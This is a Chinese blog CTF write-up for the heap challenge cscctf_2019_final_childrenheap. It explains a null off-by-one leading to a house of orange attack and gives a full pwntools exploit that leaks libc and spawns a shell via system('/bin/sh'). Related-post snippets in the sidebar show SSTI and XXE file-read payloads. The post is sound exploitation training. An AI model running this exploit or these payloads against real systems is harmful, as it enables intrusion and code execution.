cscctf_2019_final_childrenheap(house of orange)

最新推荐文章于 2023-02-10 11:27:25 发布
最新推荐文章于 2023-02-10 11:27:25 发布
阅读量685 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105855608
版权
pwn 同时被 3 个专栏收录
161 篇文章 25 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏

cscctf_2019_final_childrenheap

首先,检查一下程序的保护机制

然后用IDA分析一下

Update功能存在一个null off by one

禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。

利用null off by one,伪造chunk的prev_size和size,unsorted bin合并形成overlap chunk,从而控制住夹在中间的unsorted bin,然后就是常规的house of orange利用了,由于比较难泄露堆地址,我们就利用house of orange in 2.24的手法,让vtable为_IO_str_jumps_+xxx。

#coding:utf8
from pwn import *

#sh = process('./cscctf_2019_final_childrenheap')
sh = remote('node3.buuoj.cn',29184)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          print possible_IO_str_jumps_offset
          return possible_IO_str_jumps_offset

def add(index,size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Size:',str(size))
   sh.sendafter('Content:',content)

def edit(index,content):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendafter('Content:',content)

def show(index):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('Index:',str(index))

def delete(index):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('Index:',str(index))

add(0,0xF0,'a') #0
add(1,0xF8,'b') #1
add(2,0xF0,'c') #2
add(3,0x10,'d') #3

delete(0)
#null off by one
edit(1,'d'*0xF0 + p64(0x100 + 0x100))
delete(2)
add(0,0xF0,'a')
show(1)
sh.recvuntil('content: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'system_addr=',hex(system_addr)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)

delete(0)
add(0,0x100,'a')
#通过1,可以完全控制unsorted bin,我们可以用house of orange
fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(_IO_list_all_addr - 0x10) #unsorted bin attack在_IO_list_all_addr写入main_arena地址
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针
fake_file += p64(_IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)
edit(1,fake_file)
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:','7')
sh.sendlineafter('Size:',str(0x60))

sh.interactive()

 

ha1vk
关注
专栏目录
TypeError: LoraConfig.__init__() got an unexpected keyword argument ‘layer replication‘解决方案
weixin_43178406的博客
04-04 8万+
本文主要介绍了TypeError: LoraConfig.__init__() got an unexpected keyword argument ‘layer replication’,希望能对使用lora微调的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
190727 pwn-ciscn_final_14
热门推荐
whklhhhh的博客
07-27 2万+
搞了快三个小时才出来_(:з」∠)_几乎白给 雷泽太强了! 简单逆向后可以知道 该程序具有注册和登陆功能 注册后会给name赋值为userx,而get_flag的需求为name==adminx passwd成员存储原始密码加盐(随机数)加密后的结果 code成员存储其他成员加盐(随机数)加密后的结果 登录时校验passwd和code Struct: 00000000 User ...
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2799
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
CTFHub[技能树]-----House of orange
最新发布
saulgoodman的博客
02-10 235
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 705
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1217
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
【buuctfcscctf_2019_qual_babyheap
weixin_51055545的博客
02-15 1891
buuctfcscctf_2019_qual_babyheap】 今天找了一道100分题目,题目本身并没有那么难 例行检查 64位的程序,保护机制全开,放到IDA中分析 漏洞分析 函数功能很简单,功能基本齐全,漏洞点在creat()中, 当我们申请堆块,写入内容时,会在最后多写入一个’\x00’字节,存在off by null 溢出,但程序只允许我们申请15个堆块,因此要合理利用堆块。 利用思路 1.通过for循环申请足够多的堆块,在将其释放,构造出unsorted bin 2.堆风水,利用off
BT3 各种版本下载地址 (BackTrack_3_Final
10-27
BackTrack 3 Final 光盘版 Size: 695 MB BackTrack 3 Final USB版 Size: 784 MB BackTrack 3 Final 虚拟机镜像版 Size: 689 MB BackTrack 3 Beta2光盘版 Size: 701 MB BackTrack 3 Beta2 DVD USB版 Size: 947 MB ...
190919 pwn-第五空间final_十生
whklhhhh的博客
09-19 2万+
说是题目,其实就是飞秋0day 233 之前虽然听说过各种windows的pwn 软件停止更新已久,保护都没开,是比较古老的玩意儿了 于是很容易搜到各种POC 例如0x49D03F处的整形溢出 v54是输入进来的字符串,因此可以提供4294967295=0xffffffff=-1从而使memcpy发生缓冲区溢出的异常,然后通过覆盖SEH的方式进行利用 通过cyclic生成字符串填入,可以测出溢...
WinRAR 6.01 简体中文版_x64(无广告).exe
04-22
WinRAR 6.01 简体中文版_x64(无广告) 双击即可安装
house of orange学习报告
qq_35467337的博客
03-08 842
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 994
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1945
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
【八芒星计划】 House of Orange
carol2358的博客
09-02 398
文章目录前言CISCN2020 nofree总结 前言 House of Orange是一种用来应对heap题中没有free的情况的方法,通过把top chunk的size改小,然后申请一个大于topchunk的size的chunk来把旧的top chunk放入bin中(可以是fastbin,也可以是unsortedbin) 使用条件有: ①可以修改topchunk的size ②伪造的 size 必须要对齐到内存页 ③size 要大于 MINSIZE(0x10) ④size 要小于之后申请的 chunk.
House of orange
tbsqigongzi的博客
08-07 1018
题目中不存在 free 函数或其他释放堆块的函数。
借助gdb调试glibc代码学习House of Orange
happylzs2008的专栏
01-07 726
转自:https://bbs.pediy.com/thread-251195.htm house_of_orange https://www.jianshu.com/p/1e45b785efc1 借助gdb调试glibc代码学习House of Orange https://github.com/shellphish/how2heap/blob/master/glibc_2.25/hou...
技巧篇:禁用fastbin,利用house of orange进行测试
qq_39948058的博客
08-27 249
**前言:一道关于house of orange的一道利用题目,我感觉house of orange就是模板化的攻击 遍历。list_all,修改vtable指针。,再利用jumps进行跳转,这些,不理解的化,可以去这里https://ctf-wiki.org/pwn/linux/user-mode/io-file/exploit-in-libc2.24/里面有很详细的简绍,这里只付出一道关于house of orange的一道pwn题exp 思路:通过逆向分析,发现题目有off-by-null,第一步多.
secretHolder_hitcon_2016(有关mmap的chunk如何分配到top chunk里与普通chunk相邻)
seaaseesa的博客
04-30 692
secretHolder_hitcon_2016 这题和上一题https://blog.csdn.net/seaaseesa/article/details/105856878功能相似,并且上一题的利用手法这里同样可以利用,这里,有另一种手法,从而引出了一个新的知识点。 这题,delete功能里增加了对huge chunk的free Huge chunk的大小为0x61A80,...
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1068
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
智能水处理:Power_Wastewater_final的全面解决方案与高效节能技术
Power_Wastewater_final是一份专注于智能电力解决方案的文档,特别针对废水处理应用领域。该资源强调了Rockwell Automation在水处理和废水管理行业的专业知识与悠久历史,其产品和服务以其高质量和可靠性能而闻名,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值